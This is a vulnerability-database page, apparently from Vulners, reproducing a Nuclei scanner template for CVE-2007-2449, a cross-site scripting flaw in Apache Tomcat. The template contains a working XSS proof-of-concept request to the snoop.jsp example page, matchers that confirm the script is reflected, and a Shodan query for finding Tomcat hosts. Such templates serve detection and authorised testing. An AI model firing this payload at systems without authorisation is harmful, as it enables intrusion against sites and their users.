Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2007-2449
HistorySep 09, 2024 - 5:01 p.m.

Apache Tomcat 4.x-7.x - Cross-Site Scripting

2024-09-0917:01:10
ProjectDiscovery
github.com
13
apache tomcat
cross-site scripting
vulnerability
arbitrary script
browser
security

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

7.2

Confidence

High

EPSS

0.959

Percentile

99.5%

Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
id: CVE-2007-2449

info:
  name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
  author: pdteam,ritikchaddha
  severity: medium
  description: |
    Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://vulners.com/securityvulns/SECURITYVULNS:DOC:17267
    - https://nvd.nist.gov/vuln/detail/CVE-2007-2449
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"Apache Tomcat"
  tags: cve,cve2007,apache,misconfig,tomcat,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp'
          - 'JSP Request Method'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220123f57dd5d304a126e38f830fcc9717c81aea7327eefd83ffab2ae79963adaee02200cc51456063ab496965fb4ca5e4714e6cd8274b212d6b07b9d1d79be74d36fd0:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

7.2

Confidence

High

EPSS

0.959

Percentile

99.5%